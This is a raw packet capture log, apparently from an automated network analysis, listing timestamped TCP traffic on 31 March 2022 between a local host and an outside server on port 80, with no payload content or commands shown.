Mar 31, 2022 22:52:04.996917963 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.996967077 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.996972084 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997025013 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997025967 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997073889 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997076988 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997124910 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997129917 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997181892 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997181892 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997231007 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997235060 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997287989 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997288942 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997339010 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997340918 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997390032 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997392893 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997447968 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:04.997451067 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997502089 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:04.997900009 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.002876043 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.002953053 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003009081 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003057003 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003065109 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003093958 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003101110 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003118038 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003168106 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003170967 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003218889 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003223896 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003272057 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003277063 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003324986 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003329039 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003377914 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003381014 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003427982 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003436089 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003473043 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003485918 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.003488064 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.003535032 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005290031 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005363941 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005369902 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005418062 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005428076 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005475044 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005481958 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005530119 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005534887 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005582094 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005588055 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005640030 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005645990 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005695105 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005700111 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005750895 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005753040 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005790949 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005803108 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005826950 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005835056 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005865097 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005872011 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005903006 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005913973 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005939960 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005948067 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.005976915 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.005986929 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006014109 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006021976 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006052017 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006057978 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006089926 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006117105 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006127119 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006130934 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006174088 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006181955 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006231070 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006244898 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006283045 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006294012 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006325960 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006376982 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006426096 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006434917 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006473064 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006488085 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006510019 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006520033 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006548882 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006557941 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006584883 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006594896 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006623983 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006632090 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006660938 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006668091 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006696939 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006710052 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006735086 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006747007 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006779909 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006917953 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006958008 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.006970882 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.006994963 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007009029 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007033110 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007039070 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007071018 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007081985 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007108927 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007117033 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007144928 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007155895 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007181883 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007201910 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007217884 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.007224083 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.007265091 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.018037081 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.039638996 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039700985 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039733887 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039803982 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039856911 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039910078 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039963961 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.039963961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040002108 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040008068 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040013075 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040018082 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040018082 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040071964 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040076017 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040126085 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040127039 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040174961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040179014 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040229082 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040232897 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040286064 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040287018 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040335894 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040340900 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040395021 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040396929 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040441990 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040450096 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040498018 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040503979 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040550947 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040558100 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040606976 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040611029 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040661097 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040667057 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040719032 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040720940 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040770054 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040783882 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040834904 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040843964 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040894032 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040898085 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.040949106 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.040951967 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041002989 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041135073 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041182995 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041188955 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041238070 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041243076 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041312933 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041335106 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041367054 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041368961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041419983 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041420937 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041435957 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041474104 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041476011 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041522026 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041527033 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041574955 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041580915 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041630030 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041637897 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041691065 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041691065 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041743994 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041747093 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041800022 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041800976 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041852951 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041852951 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041904926 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.041908979 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.041956902 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.042574883 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.042593002 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.042630911 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.042932987 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.043226957 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047518015 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047595024 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047630072 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047650099 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047652960 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047705889 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047708035 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047756910 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047758102 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047811031 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047812939 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047863007 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047868013 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047916889 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047921896 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.047971010 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.047975063 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048024893 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048027039 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048074961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048080921 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048093081 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048129082 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048134089 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048181057 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048187017 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048233986 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048238993 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048285961 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048290968 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048341036 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048341990 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048389912 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048396111 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048443079 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048448086 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048495054 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048500061 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048549891 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048552036 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048590899 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048599958 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048604012 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048655987 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048660040 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048707962 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048712969 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.048762083 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.048903942 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049575090 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049633980 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049653053 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049683094 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049688101 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049741983 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049741983 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049791098 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049796104 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049844980 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049849033 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049900055 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049912930 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.049963951 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.049967051 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050017118 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050021887 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050071955 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050076008 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050126076 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050131083 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050187111 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050209045 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050209999 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050261974 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050262928 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050312042 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050314903 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050364017 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050368071 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050416946 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050421953 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050473928 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050477028 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050528049 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050529957 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050580978 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050581932 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050630093 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050636053 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050688028 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050692081 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050703049 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050736904 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050741911 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050792933 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050793886 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050843000 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050848007 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050899029 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050899982 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.050947905 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.050955057 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051002979 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051007032 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051058054 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051060915 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051110983 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051112890 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051150084 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051162958 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051166058 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051218033 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051220894 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051266909 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051270008 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051321030 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051323891 CEST	80	49165	185.46.40.47	192.168.2.22
Mar 31, 2022 22:52:05.051374912 CEST	49165	80	192.168.2.22	185.46.40.47
Mar 31, 2022 22:52:05.051377058 CEST	80	49165	185.46.40.47	192.168.2.22
